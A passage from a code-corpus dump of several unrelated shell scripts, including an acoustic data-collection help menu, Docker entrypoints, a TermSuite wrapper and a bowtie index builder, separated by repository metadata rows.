"a" -----> Go back 1 min
"D" -----> Go forward 10 mins
"d" -----> Go forward 1 min
"PgDn" --> Previous file
"PgUp" --> Next file
"ESC" ---> Back to real-time
"Up" ----> Increase threshold (dB)
"Down" --> Decrease threshold (dB)
"^Up" ---> Increase NFFT
"^Down" -> Decrease NFFT
END
)
MCCDAQ_HELP=$(cat <<-END
\033[1mSTART COLLECTING DATA\033[0m
---------------------
Start Acoustic Data Collection:
Default data directory:
/home/$USER/ACBOX/MCC_DAQ/data/
Commands:
$ config_daq # Interactive config
$ start_collect # Start data acquisition
$ kill_daq # Kill DAQ (same as Ctrl+c in shell where it was started)
END
)
OFFLOAD_HELP=$(cat <<-END
\033[1mOFFLOADING/TRANSFERRING DATA\033[0m
----------------------------
The following rsync scripts are for ease of offloading/transferring data
to a remote machine. They will not create duplicate files on the remote machine so.
Running any of these scripts with --dry-run
rsync_all --------> Transfer all data files using the data directory ..
.. in the config.json file for the DAQ (.../MCC_DAQ/config.json)
It will NOT delete files on source or remote machine
rsync_clean ------> Transfer all data files using the data directory ..
.. in the config.json file for the DAQ (.../MCC_DAQ/config.json)
It will not delete files on the remote machine
\033[1m* FILES WILL BE DELETED ON SOURCE MACHINE AFTER TRANSFER *\033[0m
rsync_parallel ---> Starts a transfer periodically (-s <FREQ-SEC>)
It will NOT delete files on source or remote machine
Offloading/Transferring Data:
$ screen -R ACBOX # attach to screen session setup for ACBOX
$ rsync_all -u <REMOTE-USER> -i <REMOTE-IP-ADDRESS> -d <REMOTE-DEST>
$ rsync_clean -u <REMOTE-USER> -i <REMOTE-IP-ADDRESS> -d <REMOTE-DEST>
---------------- SSH keys need to be setup for the parallel rsync mode ----------------
----- This avoids the process being blocked while waiting for the remote password -----
---------------------------------------------------------------------------------------
$ rsync_parallel -u <REMOTE-USER> -i <REMOTE-IP-ADDRESS> -d <REMOTE-DEST> -s <FREQ-SEC>
------------------- SSH keys should be setup for the auto rsync mode ------------------
----------------------- In this mode NO user input is required ------------------------
---------------------------------------------------------------------------------------
$ config_rsync # configure rsync remote client info for rsync_auto
$ rsync_auto # this alias calls a script called rsync_auto.sh that has the remote
# info saved in rsync_config.json
END
)
GPS_HELP=$(cat <<-END
\033[1mGPS Logger\033[0m
----------
To start the gps logger run:
$ start_logging_gps
This will output data to stdout AND a file.
The actual command is:
$ gpspipe -t -uu -r | tee $HOME/ACBOX/gps_logger/data/track_$(date +%s).nmea
END
)
HLINE=$(cat <<-END
\n ---------------------------------------------------
END
)
SCREEN_MSG=$(cat <<-END
\033[1m
==========================================================================================
==================== YOU ARE CURRENTLY IN THE ACBOX SCREEN SESSION... ====================
==========================================================================================
\033[0m
END
)
WELCOME=$(cat <<-END
$(cat $HOME/ACBOX/scripts/banner.txt)
\033[1mHelpful keyboard shortcuts and aliases:\033[0m
$ help # show complete help message
$ show_welcome # show this message again
\033[1mStart/Monitor Data Collection:\033[0m
$ screen -R ACBOX # attach to screen session setup for ACBOX
$ config_daq # interactive config
$ start_collect # start data collection with config file
--
$ cli_spectrogram # starts cli-spectrogram
$ cli_spectrogram_auto # starts cli-spectrogram with DAQ config file
\033[1mOffloading Data:\033[0m
$ screen -R ACBOX # attach to screen session setup for ACBOX
$ rsync_auto # configure by running $ config_rsync
\033[1mACBOX screen session:\033[0m
The ACBOX screen session has the following four windows:
0 - "DAQ": [C-a 0] For running the cli-spectrogram
1 - "cli": [C-a 1] For running the config_daq and start_collect processes
2 - "sync": [C-a 2] For running rsync scripts and watching progress (if parallel)
3 - "debug": [C-a 3] For debugging
4 - "GPS": [C-a 4] For GPS logging
\033[1mTo exit and detach:\033[0m
C-a d -----> Detatches the screen session. All processes will continue running
$ exit ----> End ssh session
END
)
USAGE=$(cat <<-END
usage: ./echo-help.sh # for BOTH help messages
./echo-help.sh --mccdaq # for MCC_DAQ help
./echo-help.sh --cli # for cli-spectrogram help
./echo-help.sh --offload # for rsync help
./echo-help.sh --debug # for debugging help
./echo-help.sh --gps # for GPS logging help
./echo-help.sh --help/-h # print this usage message
END
)
function print_help {
echo -e "\n\
$HEADER\n\
$MCCDAQ_HELP\
$HLINE\n\
$CLI_HELP\
$HLINE\n\
$OFFLOAD_HELP\
$HLINE\n\
$DEBUG_HELP\n";
}
MSG=""
if [[ "$#" = 0 ]] ; then
print_help
elif [[ "$1" = "welcome" ]] ; then
PRINT_HEADER=false
printf "\n$WELCOME\n"
else
for ARG in "$@"; do
# check for known args
if [ "$ARG" = "--mccdaq" ]; then
MSG="$MCCDAQ_HELP"
elif [ "$ARG" = "--cli" ]; then
MSG="$CLI_HELP"
elif [ "$ARG" = "--debug" ]; then
MSG="$DEBUG_HELP"
elif [ "$ARG" = "--offload" ]; then
MSG="$OFFLOAD_HELP"
elif [ "$ARG" = "--gps" ]; then
MSG="$GPS_HELP"
elif [ "$ARG" = "--screen" ]; then
printf "\n$WELCOME\n$SCREEN_MSG\n"
kill -SIGINT $$
else
printf "$USAGE\n"
kill -SIGINT $$
fi
# print header on first iter
# .. the following iterations will add hline
if "$PRINT_HEADER" ; then
echo -e "\n$HEADER\n"
echo -e "$MSG"
PRINT_HEADER=false
else
echo -e " $HLINE"
echo -e "$MSG"
fi
MSG=""
done
fi
echo ""
| true
|
71ade15b803819ef2bf3b9dd76388372db10963c
|
Shell
|
wxart/tfstair
|
/docker-entrypoint.sh
|
UTF-8
| 611
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/sh
LOCAL_IP=$(hostname -i)
if [ "$1" == "tair" ]; then
sed -i "s/192.168.1.1/${LOCAL_IP}/g" /usr/local/tair/etc/*.conf
/usr/local/tair/tair.sh start_ds && /usr/local/tair/tair.sh start_cs
tail -200f /usr/local/tair/logs/server.log
elif [ "$1" = "tfs" ]; then
sed -i "s/172.17.0.2/${LOCAL_IP}/g" /usr/local/tfs/conf/*.conf
if [ ! -f "/data/tfs1/fs_super" ]; then
/usr/local/tfs/scripts/stfs format 1
fi
/usr/local/tfs/scripts/tfs start_ns
sleep 3
/usr/local/tfs/scripts/tfs start_ds 1
tail -f /usr/local/tfs/logs/dataserver_1.log
else
exec "$@"
fi
| true
|
8e87cd1014c1a670c3f2c9510bab5d696b928afc
|
Shell
|
mathandy/esesc-project
|
/run_tinydnn.sh
|
UTF-8
| 1,188
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# USAGE: ./run_benchmark.sh <benchmark_name> <esesc_config_file> <simulation_config_file> <run_name> <log_path>
# e.g. ./run_benchmark.sh spec06_hmmer ~/Dropbox/esesc-lab/esesc.conf ~/Dropbox/esesc-lab/simu.conf testeroo ~/Dropbox/esesc-lab/test_results.txt
# esesc parameters
esesc_dir=~/build/release
benchmarks_dir=~/benchmarks
conf_dir=~/projs/esesc/conf
data_path="$PWD"/tiny-dnn/data/cifar-10-batches-bin
binary_dir="$PWD"/tiny-dnn/examples
cpu=boom2
# parse CLI arguments
BENCHMARK=$1
ESESC_CONFIG=$2
SIMULATION_CONFIG=$3
RUN_NAME=$4
LOG=$5
# report CLI arguments
echo
echo ---
echo Running experiment \"$RUN_NAME\" with benchmark \"$BENCHMARK\" ...
echo
# setup directory for experiment
run_dir=$esesc_dir/$RUN_NAME
mkdir $run_dir
cd $run_dir
cp -r $conf_dir/* .
cp -r $benchmarks_dir/* .
# switch to config file using TASS (and higher instruction count)
rm -f esesc.conf
cp $ESESC_CONFIG esesc.conf
cp $SIMULATION_CONFIG simu.conf.$cpu
# run experiment/benchmark
cp -r $binary_dir/* .
ESESC_benchname="./example_cifar_train --data_path $data_path" ../main/esesc | tee last-run-log.txt
# record results
./scripts/report.pl -last | tee $LOG
echo $PWD
echo $LOG
| true
|
bd7b331f17e8dddcee12c5394c4fc9f24aeed4bb
|
Shell
|
jameshilliard/tyg-bitcoin
|
/sw/usefull-stuff/titan_scanminers
|
UTF-8
| 224
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
if [ ! "$1" == "" ] ; then
F2=$1
fi
IPFILE=/home/remo/scans/TITAN-IPS-81s
F1=`mktemp`
/home/remo/miner_scripts/createdetected_slow ${IPFILE} ${F1}
sleep 33
/home/remo/miner_scripts/perform_scan.sh ${F1} ${F2}
| true
|
8f8230bcae78ac17c6590a00ffec1f9192c89e37
|
Shell
|
ErikZhou/scrape_twitter
|
/tw.sh
|
UTF-8
| 413
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
#先载入环境变量
source /etc/profile
#其他代码不变
processcount=$(pgrep tw.py|wc -l)
cd $(cd $(dirname $0) && pwd)
if [[ 0 -eq $processcount ]]
then
echo "[ $(date) ] : tw.py is down, start it!" | tee -ai ./checkprocess.log
#bash ./start.sh #这里是项目的重启脚本
python3 /home/rslsync/vps/scrape_twitter/tw.py ErickZhou
else
echo tw.py is OK!
fi
| true
|
52de64a1dc6fc512e6d3ce9742f2e190583f61ba
|
Shell
|
framiere/dotfiles
|
/bin/register-java.sh
|
UTF-8
| 496
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
JAVA_FOLDER=~/java
JENV_HOME=~/.jenv
JENV=$(brew --prefix)/bin/jenv
RED='\x1B[0;31m'
GREEN='\x1B[0;32m'
NC='\x1B[0m' # No Color
unregister-java.sh
cd ${JAVA_FOLDER}
for file in jdk*; do
if [ -f ${file}/bin/java ]; then
echo Register ${file}
${JENV} add $file $file > /dev/null 2>&1
INSTALLED=$(${JENV} versions --bare | grep -c ${file})
if [[ "${INSTALLED}" -ne "1" ]]; then
echo -e "${RED}NOT INSTALLED${NC}"
else
echo -e "${GREEN}Installed${NC}"
fi
fi
done
| true
|
0a9ced80d9988102a1ba95342aea7f31dcaa6165
|
Shell
|
rodriguezmDNA/rnaseqScripts
|
/Scripts/03a_makeBowtieIndex.sh
|
UTF-8
| 7,669
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
# j rodriguez medina
# Brady lab @ ucdavis
# Bowtie mapping
# Last modified
# 2017.10.jrm
# !!!!!!!!!!!!!!!!!!!!!!!!!!
# Don't use masked genomes
## Bowtie 2's command-line arguments and genome index format are both different from Bowtie 1's.
## When to use bowtie1 or bowtie2?
# If reads are >50bp, use bowtie2
# If reads are shorter than 50bp, use bowtie1 (aka, bowtie)
############
# Set options:
# {bwt1/bwt2} -> Align with bowtie1 OR bowtie2
# {cdna/genome} -> Align to cDNA or genome
## Used to check if index files already exist.
display_help() {
echo "Wrapper to build a reference index using bowtie{1/2}. " >&2
echo "If the script detects an existing index it won't create a new one." >&2
echo "At least one reference (cDNA or genome) needed [-c/-g]" >&2
echo "The script handles both or either, but needs at least one fasta file." >&2
echo ""
echo "Usage: $0 [option...] " >&2
echo ""
echo
echo " -h this useful help"
echo " -v bowtie version [bwt1/bwt2]"
echo " -g path to the genome fasta"
echo " -c path to the cDNA fasta"
echo "Optional: "
echo " -s suffix of the reference (default: \"ref\")"
echo
echo "example: ./03a_MakeBowtieIndex.sh -v bwt1 -s athIndex -g meta/genome_ath_TAIRv10.fa -c meta/cdna_ath_TAIRv10.fa"
echo "example 2 (no cDNA reference):
Scripts/03a_MakeBowtieIndex.sh -v bwt1 -s athIndex -g meta/genome_ath_TAIRv10.fa"
echo
#echo "Assumptions:"
#echo "* A directory with trimmed reads (with extension \"clean\" on a folder named '01_trimmed/')"
#echo "* The index of the reference is in a 'RefIdx/' directory with format: "
#echo " 'bwt{v}_reference'. ie, that the directory 'RefIdx/bwt1_cdna/' exists and contains index files"
#echo " built with the appropiate bowtie version"
echo -e "\n don't panic! "
echo " github: rodriguezmDNA "
echo " Last modified: 2017.10 - jrm - @ UC Davis "
exit 1
}
if [ $# -eq 0 ]
then
display_help
fi
#### Some predefined options. Modify at your own risk
## Read data. This assumes you have the 01_trimmed folder after trimming with reaper.
#In params:
#genomeFasta=$DIR'/meta/genome_ath_TAIRv10.fa'
#cdnaFasta=$DIR'/meta/cdna_ath_TAIRv10.fa'
suffixOut='RefIdx' #Same as BuildIndex script
while getopts ':hv:r:g:c:s:' option; do
case "$option" in
h) display_help
exit
;;
v) optionBowtie=$OPTARG
if [ $optionBowtie == 'bwt1' ] || [ $optionBowtie == 'bwt2' ]
then
echo ""
else
echo "Bowtie version not valid" >&2
display_help
fi
;;
g) genomeFasta=$OPTARG
;;
c) cdnaFasta=$OPTARG
;;
s) suffixOut=$OPTARG
;;
:) printf "missing value for -%s\n" "$OPTARG" >&2
display_help
exit 1
;;
\?) printf "illegal option: -%s\n" "$OPTARG" >&2
display_help
exit 1
;;
esac
done
shift $((OPTIND - 1))
######### Validate parameters
############################################
## Reference Option
if [ $optionBowtie == 'bwt1' ] || [ $optionBowtie == 'bwt2' ]
then
echo ""
else
echo "Invalid version please use 'bwt1' or 'bwt2'"
display_help
fi
if [[ -z $genomeFasta && -z $cdnaFasta ]] ; then
echo "Specify at least one reference fasta file for the index (-g fastaFile or -c fastaFile)"
display_help
fi
# ### If empty, set to default parameters
# if [[ -z $paramsFile ]] ; then
# echo "Bowtie parameters are empty, using default parameters" >&2
# case $optionBowtie in
# bwt1)
# # Bowtie 1 parameters I use
# bwtParams="-a --best --strata -n 1 -m 1 -p 4 --sam --tryhard"
# ;;
# bwt2)
# bwtParams="--time -p3 -k 10 --sensitive-local --no-unal"
# ;;
# # *)
# # echo "Option not valid" >&2
# # display_help
# # ;;
# esac
# else
# ### Read parameters
# bwtParams=`cat $paramsFile`
# fi
############################################
######### Start of the Analysis
############################################
############
## Record time
start_time=`date +%s`
## Get absolute path
#Get the full path of the current script: Go back one folder (from scripts to main)
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.."
## Keep track of errors and outputs in a log.
logDir=$DIR/logs #Create log folder if it doesn't exist
if [ ! -d $logDir ]; then echo `mkdir -p $logDir`; fi
##
#logBow=$DIR/logs/bowStats"_"$optionAlign$optionBowtie #Create log folder if it doesn't exist
#if [ ! -d $logBow ]; then echo `mkdir -p $logBow`; fi
######
## Use the same script's name but add the log extension
## Two ways: split string by dots, keep the first part
# logPath=$DIR/logs/$(basename $BASH_SOURCE | cut -d . -f1).log # What if the script name has more dots?
## Removes specific extension:
logPath=$DIR/logs/$(basename $BASH_SOURCE .sh).$suffixOut$optionBowtie.log
## Create a log file and start writing.
echo `touch $logPath` #Create file to fill with log data
echo "Started on `date`" 2>&1 | tee $logPath
############
######
echo -e "Index Creation with option $optionBowtie \n" 2>&1 | tee $logPath
#### Functions
checkDir () {
if [ ! -d $toDir ]; then
echo "Creating directory $toDir" 2>&1 | tee -a $logPath;
mkdir -p $toDir;
else
echo "Directory $toDir found" 2>&1 | tee -a $logPath;
fi;}
checkIndex () {
if [ ! -f $toDir/$suffixOut.1.ebwt ]; then
echo -e "Building index\n" 2>&1 | tee -a $logPath;
#echo $buildIndex
## Build index:
$bwt $buildIndex 2>&1 | tee -a $logPath;
else
echo -e "An index file was found, not building new index \n" 2>&1 | tee -a $logPath;
fi;}
########################################################################################################################
########################################################################################################################
# Out params:
genomeToPath=$DIR"/RefIdx/"$optionBowtie"_genome"
cdnaToPath=$DIR"/RefIdx/"$optionBowtie"_cdna"
## Choose flags for Bowtie or Bowtie 2
if [ $optionBowtie == "bwt1" ]; then
echo "Bowtie1"
# Set Global Parameters
pattern=*.ebwt
bwt=bowtie-build
## Genome
echo -e "\n Genome Index"
toDir=$genomeToPath
checkDir $toDir
# Check if index exists
buildIndex="$genomeFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
# cDNA
echo -e "\n Transcriptome Index"
toDir=$cdnaToPath
checkDir $toDir
# Check if index exists
buildIndex="$cdnaFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
else
## Bowtie 2
if [ $optionBowtie == "bwt2" ]; then
echo "Bowtie2"
# Set Global Parameters
pattern=*.bt2
bwt=bowtie2-build
## Genome
echo -e "\n Genome Index"
toDir=$genomeToPath
checkDir $toDir
# Check if index exists
buildIndex="$genomeFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
# cDNA
echo -e "\n Transcriptome Index"
toDir=$cdnaToPath
checkDir $toDir
# Check if index exists
buildIndex="$cdnaFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
fi;fi;
########################################################################################################################
########################################################################################################################
## Record time
end_time=`date +%s`
echo -e "\n\tParameters used:
mode: $bwt
Genome FASTA: $genomeFasta
cDNA FASTA: $cdnaFasta
Suffix: $suffixOut" 2>&1 | tee -a $logPath
echo -e "\n\texecution time was `expr $end_time - $start_time` s." 2>&1 | tee -a $logPath
echo -e "\n\tDone `date`" 2>&1 | tee -a $logPath
##Done
| true
|
0c30c6eafc75de69293c0abe73e7b5720bbdffa0
|
Shell
|
cc-archive/mozcc
|
/build.sh
|
UTF-8
| 336
| 2.625
| 3
|
[] |
no_license
|
#! /bin/sh
# Bundle Build Script for MozCC
# (c) 2007, Nathan R. Yergler, Creative Commons
# Licensed to the public; see LICENSE for details
# create XPI files for individual pieces
cd metacore
zip -r ../metacore.xpi *
cd ..
cd mozcc-ui
zip -r ../mozcc-ui.xpi *
cd ..
# create the bundle
zip -r mozcc.xpi install.rdf metacore.xpi mozcc-ui.xpi
| true
|
e5a925689737a749a1d6e76865b924092401132c
|
Shell
|
Brzhk/jenkins
|
/buildscripts/releaseSupportedAlpineImages.sh
|
UTF-8
| 974
| 3.65625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -x
set -o errexit # abort script at first error
# Setting environment variables
readonly CUR_DIR=$(cd $(dirname ${BASH_SOURCE:-$0}); pwd)
printf '%b\n' ":: Reading release config...."
source ${CUR_DIR}/release.sh
readonly PUSH_REPOSITORY=$1
readonly PUSH_JENKINS_VERSION=${JENKINS_VERSION}
readonly PUSH_JENKINS_STABLE_VERSION=${JENKINS_STABLE_VERSION}
function retagImage() {
local tagname=$1
local repository=$2
docker tag -f blacklabelops/jenkins:${tagname} ${repository}/blacklabelops/jenkins:${tagname}
}
function pushImage() {
local tagname=$1
local repository=$2
if [ "$repository" != 'docker.io' ]; then
retagImage ${tagname} ${repository}
fi
docker push ${repository}/blacklabelops/jenkins:${tagname}
}
pushImage latest ${PUSH_REPOSITORY}
pushImage ${PUSH_JENKINS_VERSION} ${PUSH_REPOSITORY}
pushImage ${PUSH_JENKINS_STABLE_VERSION} ${PUSH_REPOSITORY}
pushImage rc ${PUSH_REPOSITORY}
pushImage stable-rc ${PUSH_REPOSITORY}
| true
|
d0b695a37e5ffd6d1900e8284a60c97b3caf5981
|
Shell
|
annonymouse/zfs-ubuntu-bootstrap
|
/bootstrap.sh
|
UTF-8
| 399
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
if [ `id -u` != "0" ] ; then
echo "Need to run as root privlege"
exit 2
fi
apt-add-repository --yes ppa:zfs-native/stable
apt-get update
apt-get install --yes debootstrap spl-dkms zfs-dkms ubuntu-zfs
modprobe zfs
set +e
dmesg | grep ZFS
if [ $? -ne 0 ] ; then
echo "ZFS did not load correctly, fail fail fail"
exit 2
fi
set -e
echo "Installed ZFS modules"
exit 0
| true
|
59ee0cfae3899729c164cc3ce54a62e676baa5d2
|
Shell
|
umm-csci-3412-fall-2021/lab-0-command-line-intro-uno
|
/compiling/extract_and_compile.sh
|
UTF-8
| 860
| 3.84375
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/bash
# sysinfo_page - This script extracts and compiles a C program known as "NthPrime."
prime=$1 #This variable takes in the prime that NthPrime will use to find the correct Nth prime.
tar -x -z -f NthPrime.tgz #Meanwhile, this command extracts the tar file with respect to a gunzipped format, along with its name.
cd NthPrime || exit #On the other hand, this command will "cd" into a directory created via the extraction of the NthPrime file.
#If this operation were to fail, the directory will be exited.
gcc ./*.c -o NthPrime #After entering the directory, the NthPrime program will be compiled and be able to output from an executable
#called "NthPrime"
./NthPrime "$prime" #This passes any number specified in the prime variable into the program, allowing for NthPrime to compute the Nth prime.
| true
|
a64bb63ca4054111cc584e4256597a062a575704
|
Shell
|
DanAnkers/crankcase
|
/cartridges/python-2.6/info/bin/app_ctl.sh
|
UTF-8
| 317
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source "/etc/stickshift/stickshift-node.conf"
source ${CARTRIDGE_BASE_PATH}/abstract/info/lib/util
# Import Environment Variables
for f in ~/.env/*
do
. $f
done
export APPDIR="${OPENSHIFT_GEAR_DIR}"
# Federate call to abstract httpd.
${CARTRIDGE_BASE_PATH}/abstract-httpd/info/bin/app_ctl.sh "$@"
| true
|
f67d2ffbe341703bd72bca20e71f6608e3551642
|
Shell
|
afreeorange/dotfiles
|
/.config/bash/conf.d/10-options.sh
|
UTF-8
| 327
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Autocorrect typos in path names when using `cd`
shopt -s cdspell
# Update LINES and COLUMNS on screen resize
shopt -s checkwinsize
# For history; force commands to fit on one line
shopt -s cmdhist
# Append to history instead of overwriting
shopt -s histappend
# Case-insensitive globbing
shopt -s nocaseglob
| true
|
f5e689cedb8f8c52ad1682a86aa27a196b4166cf
|
Shell
|
JakeSeib/mbta_departures
|
/scripts/install_dependencies.sh
|
UTF-8
| 621
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# EXPORT LANGUAGES
source /etc/profile.d/lang.sh
export LANG='en_US.UTF-8'
export LC_ALL='en_US.UTF-8'
# INSTALL DEPENDENCIES
yum install -y zlib-devel epel-release python38 python38-devel mysql-devel httpd-devel
yum -y groupinstall development
yum update -y
# COPY VirtualHost CONF
cp /var/www/basic_app/basic_app.conf /etc/httpd/conf.d/basic_app.conf
# BUILD MOD_WSGI AND INSTALL
wget "https://github.com/GrahamDumpleton/mod_wsgi/archive/4.7.1.tar.gz"
tar -xzf '4.7.1.tar.gz'
cd ./mod_wsgi-4.7.1
./configure --with-python=/usr/bin/python3.8
make
make install
cd ..
rm -rf mod_wsgi-4.7.1
rm 4.7.1.tar.gz
| true
|
e5c53873f17680e2841afb7c2508462ecb7b9da6
|
Shell
|
ImperadorSid/ubuntu-setup
|
/linux.sh
|
UTF-8
| 1,021
| 3.15625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Softwares
echo 'Instalando pacotes do usuário'
sudo apt install -y $(cat packages/user.txt)
# Snaps
echo 'Instalando snaps'
sudo snap install $(cat packages/snaps-user.txt)
sudo snap install --beta authy
# Unused softwares
echo 'Removendo pacotes não utilizados'
sudo apt purge -y $(cat packages/unused.txt)
# Unused snaps
echo 'Removendo snaps não utilizados'
sudo snap remove $(cat packages/snaps-unused.txt)
# Clean packages
echo 'Limpando cache do repositório de pacotes'
sudo apt update
sudo apt upgrade -y
sudo apt clean
# Pastas
echo 'Criando pastas'
mkdir ~/.cache/fish_compare
mkdir ~/.local/bin
# Fish
echo 'Configurando o fish shell'
sudo chsh -s /usr/bin/fish impsid
./initial-settings.fish
# Date and time
echo 'Alterando funcionamento do relógio do sistema'
timedatectl set-local-rtc true
# KVM
echo 'Adicionando usuário ao grupo das máquinas virtuais'
sudo adduser impsid kvm
# DConf settings
echo 'Restaurando configurações via DConf'
dconf load / < settings.ini
| true
|
1fae04d9f5bf130b1d2b657dad5a4a6ce5a37ecb
|
Shell
|
VisaTM/termsuite-docker-galaxy
|
/TermSuiteWrapper.sh
|
UTF-8
| 6,460
| 3.609375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
prog=`basename $0`
subs=`echo -n $prog | perl -C7 -pe 's/./\x{00A0}/go;'`
USAGE=" \n"
USAGE+="Usage: $prog -d directory -f file -l (en|fr) -o output [ -t (json|tsv) ] \n"
USAGE+=" $subs [ -x memory ] [ -a option ]\n"
USAGE+=" $prog -h "
# USAGE="$part1$part2$part3"
help=0
indice=0
ts="none"
while getopts a:d:f:hl:o:t:x: i
do
case $i in
a) extra[$indice]=$OPTARG
indice=$((indice + 1));;
d) dir=$OPTARG;;
f) file=$OPTARG;;
h) help=1;;
l) language=$OPTARG;;
o) output=$OPTARG;;
t) ts=$OPTARG;;
x) memory=$OPTARG;;
\?) /bin/echo -e $USAGE >&2
exit 1;;
esac
done
if [ "$help" -gt 0 ]
then
/bin/echo -e $USAGE
/bin/echo ""
/bin/echo " -a add an extra option. An option with an argument must "
/bin/echo " be written with an equal sign “=”, as for example: "
/bin/echo " “-a --ranking-asc=frequency” "
/bin/echo " -d indicates the temporary directory where the treatment "
/bin/echo " will be done"
/bin/echo " -f gives the name of the file containing the list of text "
/bin/echo " files to process "
/bin/echo " -h displays that help and exits "
/bin/echo " -l indicates the language to process (en|fr) "
/bin/echo " -o gives the name of the output file (TSV by default) "
/bin/echo " -t outputs the raw TermSuite file (JSON or TSV) "
/bin/echo " -x modifies the maximum memory allocation for the Java "
/bin/echo " virtual machine (e.g. “512m” or “4g”)"
/bin/echo ""
exit 0
fi
if [ -n "$memory" ]
then
case $memory in
[1-9][0-9]*[kmg]) memory="-Xmx$memory";;
*) /bin/echo -e "\n$prog: wrong memory value “$memory”" >&2
/bin/echo -e "\nIt should be a positive integer followed by one letter: m or g. " >&2
exit 4;;
esac
fi
if [ -z "$dir" -o -z "$file" -o -z "$output" ]
then
/bin/echo -e $USAGE >&2
exit 1
fi
if [ -z "$language" ]
then
/bin/echo -e $USAGE >&2
exit 1
else
case $language in
en) ;;
fr) ;;
*) /bin/echo -e "\n$prog: wrong language option “$language”" >&2
/bin/echo -e "\n$USAGE" >&2
exit 1;;
esac
fi
if [ -z "$ts" ]
then
/bin/echo -e $USAGE >&2
exit 1
else
case $ts in
json) ;;
none) ;;
tsv) ;;
*) /bin/echo -e "\n$prog: wrong option “-t $ts”" >&2
/bin/echo -e "\n$USAGE" >&2
exit 1;;
esac
fi
indice=0
erreur=0
for option in ${extra[@]}
do
case $option in
--capped-size=*) ;;
--context-assoc-rate=*) ;;
--context-coocc-th=*) ;;
--context-scope=*) ;;
--contextualize) ;;
--disable-derivative-splitting) ;;
--disable-gathering) ;;
--disable-merging) ;;
--disable-morphology) ;;
--disable-native-splitting) ;;
--disable-post-processing) ;;
--disable-prefix-splitting) ;;
--enable-semantic-gathering) ;;
--encoding=*) ;;
-e=*) ;;
--from-prepared-corpus=*) ;;
--from-text-corpus=*) ;;
-c=*) ;;
--graphical-similarity-th=*) ;;
--nb-semantic-candidates=*) ;;
--no-occurrence) ;;
--post-filter-keep-variants) ;;
--post-filter-max-variants=*) ;;
--post-filter-property=*) ;;
--post-filter-th=*) ;;
--post-filter-top-n=*) ;;
--postproc-affix-score-th=*) ;;
--postproc-affix-score-th=*) ;;
--postproc-independance-th=*) ;;
--postproc-variation-score-th=*) ;;
--pre-filter-max-variants=*) ;;
--pre-filter-property=*) ;;
--pre-filter-th=*) ;;
--pre-filter-top-n=*) ;;
--ranking-asc=*) ;;
--ranking-desc=*) ;;
--resource-dir=*) ;;
--resource-jar=*) ;;
--resource-url-prefix=*) ;;
--semantic-dico-only) ;;
--semantic-distance=*) ;;
--semantic-similarity-th=*) ;;
--synonyms-dico=*) ;;
--tsv-hide-headers) ;;
--tsv-hide-variants) ;;
--tsv-properties=*) ;;
--watch=*) ;;
*) erreur=$((erreur + 1))
echo "$prog: wrong option “$option”" >&2;;
esac
done
if [ $erreur -gt 0 ]
then
echo "$prog: too many errors! " >&2
exit 2
fi
extras=${extra[@]/=/ }
if [ ! -f $file ]
then
/bin/echo "$prog: cannot find file “$file”" >&2
exit 2
fi
if [ ! -d $dir ]
then
mkdir -p $dir
fi
if [ ! -d $dir ]
then
/bin/echo "$prog: cannot create directory “$dir”" >&2
exit 3
fi
if [ -f $output ]
then
rm -f $output
fi
perl -ne 's/^\s+//o; print if /\w/o;' $file |
sort |
while read x
do
y=`basename $x .dat`
ln -s $x $dir/$y.txt
done
if [ $ts = "json" ]
then
java $memory -cp /opt/TermSuite/termsuite-core-3.0.10.jar fr.univnantes.termsuite.tools.TerminologyExtractorCLI \
-t /opt/treetagger/ -c $dir -l $language --json $output $extras
elif [ $ts = "tsv" ]
then
java $memory -cp /opt/TermSuite/termsuite-core-3.0.10.jar fr.univnantes.termsuite.tools.TerminologyExtractorCLI \
-t /opt/treetagger/ -c $dir -l $language --tsv $output $extras
elif [ $ts = "none" ]
then
java $memory -cp /opt/TermSuite/termsuite-core-3.0.10.jar fr.univnantes.termsuite.tools.TerminologyExtractorCLI \
-t /opt/treetagger/ -c $dir -l $language --json TS_output.json $extras
TermSuiteJson2Tsv.pl -f TS_output.json -s $output
rm -r TS_output.json
fi
rm -rf $dir
exit 0
| true
|
486ece8c4ed4bf428f93782d6c70bc26a6d5aa08
|
Shell
|
errcricket/Assembly_Pipeline
|
/ls_bsr/transcriptomics/make_plots.sh
|
UTF-8
| 1,122
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
function alter_headers
{
for file in gene_candidates/B201_DL3Z3_aa.fasta gene_candidates/B241_DL3Z3_aa.fasta gene_candidates/B201_DL3Z3_nt.fasta gene_candidates/B241_DL3Z3_nt.fasta gene_candidates/B201_UL3Z3_aa.fasta gene_candidates/B241_UL3Z3_aa.fasta gene_candidates/B201_UL3Z3_nt.fasta gene_candidates/B241_UL3Z3_nt.fasta gene_candidates/B241_UL3selected_nt.fasta
do
fasta_formatter -i $file -o TEMP
mv TEMP $file
python alter_header.py $file
done
}
function plot_images
{
#Rscript plot_transcriptomics.R B201_U/B201_U_bsr_matrix.txt Up_B201.png B201 Up-Regulated
#Rscript plot_transcriptomics.R B241_U/B241_U_bsr_matrix.txt Up_B241.png B241 Up-Regulated
#Rscript plot_transcriptomics.R B201_D/B201_D_bsr_matrix.txt Down_B201.png B201 Down-Regulated
#Rscript plot_transcriptomics.R B241_D/B241_D_bsr_matrix.txt Down_B241.png B241 Down-Regulated
